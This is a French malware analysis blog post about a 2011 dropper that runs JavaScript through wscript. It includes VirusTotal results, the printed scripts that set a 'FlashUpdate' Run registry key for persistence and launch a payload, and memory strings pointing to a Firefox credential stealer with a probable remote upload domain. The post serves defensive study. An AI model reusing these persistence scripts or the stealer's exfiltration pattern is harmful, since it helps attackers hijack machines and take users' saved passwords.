Dropper originale avec wscript et Javascript

Aujourd’hui, un dropper original :

http://www.virustotal.com/file-scan/report.html?id=7da75c2b1cc71c1cd40060a1b76d7d36c46ced51396fa3c07ef8167dbd5174f5-1302205049 

File name: file.exe
Submission date: 2011-04-07 19:37:29 (UTC)
Current status: finihed
Result: 3/ 40 (7.5%)

Safety score: –
Compact
Print results
Antivirus     Version     Last Update     Result
AhnLab-V3    2011.04.08.00    2011.04.07    –
AntiVir    7.11.6.4    2011.04.07    –
Antiy-AVL    2.0.3.7    2011.04.06    –
Avast    4.8.1351.0    2011.04.07    –
Avast5    5.0.677.0    2011.04.01    –
AVG    10.0.0.1190    2011.04.07    –
BitDefender    7.2    2011.04.07    –
CAT-QuickHeal    11.00    2011.04.07    –
ClamAV    0.97.0.0    2011.04.07    –
Commtouch    5.2.11.5    2011.04.06    –
Comodo    8259    2011.04.07    Heur.Suspicious
DrWeb    5.0.2.03300    2011.04.07    –
Emsisoft    5.1.0.5    2011.04.07    –
eTrust-Vet    36.1.8259    2011.04.07    –
F-Prot    4.6.2.117    2011.04.07    –
F-Secure    9.0.16440.0    2011.04.07    –
Fortinet    4.2.254.0    2011.04.07    –
GData    22    2011.04.07    –
Ikarus    T3.1.1.103.0    2011.04.07    –
Jiangmin    13.0.900    2011.04.07    –
K7AntiVirus    9.96.4320    2011.04.07    –
Kaspersky    7.0.0.125    2011.04.07    –
McAfee    5.400.0.1158    2011.04.07    –
McAfee-GW-Edition    2010.1C    2011.04.07    Heuristic.BehavesLike.Win32.Downloader.H
Microsoft    1.6702    2011.04.07    –
NOD32    6023    2011.04.07    –
Panda    10.0.3.5    2011.04.07    –
PCTools    7.0.3.5    2011.04.07    –
Prevx    3.0    2011.04.07    Medium Risk Malware
Rising    23.52.03.06    2011.04.07    –
Sophos    4.64.0    2011.04.07    –
SUPERAntiSpyware    4.40.0.1006    2011.04.06    –
Symantec    20101.3.2.89    2011.04.07    –
TheHacker    6.7.0.1.168    2011.04.07    –
TrendMicro    9.200.0.1012    2011.04.07    –
TrendMicro-HouseCall    9.200.0.1012    2011.04.07    –
VBA32    3.12.14.3    2011.04.07    –
VIPRE    8949    2011.04.07    –
ViRobot    2011.4.7.4398    2011.04.07    –
VirusBuster    13.6.293.1    2011.04.07    –
Additional information
MD5   : 7c1ac4d1f01b0f47c6ac414cf24a36ca
SHA1  : afcb30b93bc72225b2da28f80368adbdd904f71a
SHA256: 7da75c2b1cc71c1cd40060a1b76d7d36c46ced51396fa3c07ef8167dbd5174f5

D’habitude pour créer son fichier et la clef de démarrage, le dropper utilise plusieurs techniques…. drop de fichier .bat, injection de processus systèmes (spoolsv.exe par exemple dans le cas de TDSS/Alueron), écriture directe dans le registre.
Le code peut être détecter ou le mécanisme reconnu par des antivirus qui peuvent alors générer des alertes.

Ce dropper dropper un fichier javascript qui va être executé par wscript.exe, ce qui est déjà assez original en soi:

Parent process:
Path: C:\Documents and Settings\Mak\file.exe
PID: 4940
Child process:
Path: C:\WINDOWS\system32\wscript.exe
Information: Microsoft (r) Windows Based Script Host (Microsoft Corporation)
Command line:wscript.exe « C:\DOCUME~1\Mak\LOCALS~1\Temp\2322422.js »

Le contenu du script :

var x=new ActiveXObject(‘WScript.Shell’); x.RegWrite(‘HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\FlashUpdate’,’wscript.exe « C:\\Program Files\\Fichiers communs\\ComObject\\data.js »‘);

On voit donc que le but est de créer une clef Run FlashUpdate qui lancement un autre Javascript – ce qui donne la ligne suivante sur HijackThis :

O4 – HKCU\..\Run: [FlashUpdate] wscript.exe « C:\Program Files\Fichiers communs\ComObject\data.js »

http://www.virustotal.com/file-scan/report.html?id=7da75c2b1cc71c1cd40060a1b76d7d36c46ced51396fa3c07ef8167dbd5174f5-1302205049

File name: data.js
Submission date: 2011-04-07 19:40:00 (UTC)
Current status: queued (#3) queued (#3) analysing finished
Result: 1/ 42 (2.4%)
VT Community
Compact Print results
Antivirus Version Last Update Result
AhnLab-V3 2011.04.08.00 2011.04.07 –
AntiVir 7.11.6.4 2011.04.07 –
Antiy-AVL 2.0.3.7 2011.04.06 –
Avast 4.8.1351.0 2011.04.07 –
Avast5 5.0.677.0 2011.04.01 –
AVG 10.0.0.1190 2011.04.07 –
BitDefender 7.2 2011.04.07 –
CAT-QuickHeal 11.00 2011.04.07 –
ClamAV 0.97.0.0 2011.04.07 –
Commtouch 5.2.11.5 2011.04.06 –
Comodo 8259 2011.04.07 –
DrWeb 5.0.2.03300 2011.04.07 –
Emsisoft 5.1.0.5 2011.04.07 –
eSafe 7.0.17.0 2011.04.04 –
eTrust-Vet 36.1.8259 2011.04.07 –
F-Prot 4.6.2.117 2011.04.07 –
F-Secure 9.0.16440.0 2011.04.07 –
Fortinet 4.2.254.0 2011.04.07 –
GData 22 2011.04.07 –
Ikarus T3.1.1.103.0 2011.04.07 –
Jiangmin 13.0.900 2011.04.07 –
K7AntiVirus 9.96.4320 2011.04.07 –
Kaspersky 7.0.0.125 2011.04.07 –
McAfee 5.400.0.1158 2011.04.07 –
McAfee-GW-Edition 2010.1C 2011.04.07 Heuristic.LooksLike.JS.Suspicious.B
Microsoft 1.6702 2011.04.07 –
NOD32 6023 2011.04.07 –
Norman 6.07.07 2011.04.07 –
Panda 10.0.3.5 2011.04.07 –
PCTools 7.0.3.5 2011.04.07 –
Prevx 3.0 2011.04.07 –
Rising 23.52.03.06 2011.04.07 –
Sophos 4.64.0 2011.04.07 –
SUPERAntiSpyware 4.40.0.1006 2011.04.06 –
Symantec 20101.3.2.89 2011.04.07 –
TheHacker 6.7.0.1.168 2011.04.07 –
TrendMicro 9.200.0.1012 2011.04.07 –
TrendMicro-HouseCall 9.200.0.1012 2011.04.07 –
VBA32 3.12.14.3 2011.04.07 –
VIPRE 8949 2011.04.07 –
ViRobot 2011.4.7.4398 2011.04.07 –
VirusBuster 13.6.293.1 2011.04.07 –
Additional informationShow all
MD5   : 5d28d00e2afa97fd5113e9a40b78d0c2
SHA1  : 8a7166628aafc24f1718f0ff6c7d7574c2c992df
SHA256: bcde43c50c37a571c7b44ecdf8a578f8810383c2cf048eea4b676cabc8f3476d
Le contenu du script : 

h) {
var t=0;
for (var i=0;i<path.length;i++) {
if (path.charAt(i)==’\\’) {
t=i;
}
}
if (t>0) {
return path.substring(0,t+1);
} else {
return NaN;
}
}

var wsh1= »WScript.Shell »;
var wsh=new ActiveXObject(wsh1);
wsh.Run(‘ »‘+extractFPath(WScript.ScriptFullName)+’sq0.exe »‘);

Le but du script est donc de lancer un fichier C:\Program Files\Fichiers communs\ComObject\sq0.exe dont voici la détection :

Un dropper originale avec Javascript et wscript

http://www.virustotal.com/file-scan/report.html?id=5436f5725d249a09a0f7dd57a522e08fb58a4e4bc67dc76693d5be09bb7edd84-1302204954 

File name: sq0.exe
Submission date: 2011-04-07 19:35:54 (UTC)
Current status: queued (#3) queued analysing finished
Result: 0/ 41 (0.0%)

Compact Print results
Antivirus Version Last Update Result
AhnLab-V3 2011.04.08.00 2011.04.07 –
AntiVir 7.11.6.4 2011.04.07 –
Antiy-AVL 2.0.3.7 2011.04.06 –
Avast 4.8.1351.0 2011.04.07 –
Avast5 5.0.677.0 2011.04.01 –
AVG 10.0.0.1190 2011.04.07 –
BitDefender 7.2 2011.04.07 –
CAT-QuickHeal 11.00 2011.04.07 –
ClamAV 0.97.0.0 2011.04.07 –
Commtouch 5.2.11.5 2011.04.06 –
Comodo 8259 2011.04.07 –
DrWeb 5.0.2.03300 2011.04.07 –
eSafe 7.0.17.0 2011.04.04 –
eTrust-Vet 36.1.8259 2011.04.07 –
F-Prot 4.6.2.117 2011.04.07 –
F-Secure 9.0.16440.0 2011.04.07 –
Fortinet 4.2.254.0 2011.04.07 –
GData 22 2011.04.07 –
Ikarus T3.1.1.103.0 2011.04.07 –
Jiangmin 13.0.900 2011.04.07 –
K7AntiVirus 9.96.4320 2011.04.07 –
Kaspersky 7.0.0.125 2011.04.07 –
McAfee 5.400.0.1158 2011.04.07 –
McAfee-GW-Edition 2010.1C 2011.04.07 –
Microsoft 1.6702 2011.04.07 –
NOD32 6023 2011.04.07 –
Norman 6.07.07 2011.04.07 –
Panda 10.0.3.5 2011.04.07 –
PCTools 7.0.3.5 2011.04.07 –
Prevx 3.0 2011.04.07 –
Rising 23.52.03.06 2011.04.07 –
Sophos 4.64.0 2011.04.07 –
SUPERAntiSpyware 4.40.0.1006 2011.04.06 –
Symantec 20101.3.2.89 2011.04.07 –
TheHacker 6.7.0.1.168 2011.04.07 –
TrendMicro 9.200.0.1012 2011.04.07 –
TrendMicro-HouseCall 9.200.0.1012 2011.04.07 –
VBA32 3.12.14.3 2011.04.07 –
VIPRE 8949 2011.04.07 –
ViRobot 2011.4.7.4398 2011.04.07 –
VirusBuster 13.6.293.1 2011.04.07 –
Additional informationShow all
MD5   : 4fecaa4cd6330b0f5c5ab3762c74930d
SHA1  : b3b253f921015b02769326399da463b82d360ef7
SHA256: 5436f5725d249a09a0f7dd57a522e08fb58a4e4bc67dc76693d5be09bb7edd84

Voici les strings en mémoire :sq0.exe.txt

On peux raisonnablement penser que le malware est un stealer au vu des strings suivantes :

hdhA
LhA
ZYYd
SOFTWARE\
Mozilla
Firefox
\Main
QSVW
h4qA
hxqA
h4qA
ZYYd
APPDATA
Path
Profile0
hostname
encryptedUsername
encryptedPassword
QSVW
tkj
jPVS
tJj
POST
h0sA
h<sA
h0sA
hhsA
ZYYd
—————————–7d42bc3a61c
Content-Disposition: form-data; name= »a »
—————————–7d42bc3a61c–
Content-Type: multipart/form-data; boundary=—————————7d42bc3a61c

+ des lignes relatives à sqllite pour aller taper dans les bases de Firefox.

Le malware doit contenir un timer qui programme sa fermeture.

A noter aussi :

lesapprentisnomades.fr
/meteo/templates/
DjeW0:EHMaP639wBpYNc5rVGnSKy8qTUFvJgQkAlC .xt72O4ubXm1oizRLdZshfI
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.:
Vng3yqjah9rr

Une technique assez originale qui peut mettre en défaut les antivirus ou la reconnaissance automatisée de droppers par les IDS.

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 22 times, 1 visits today)

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *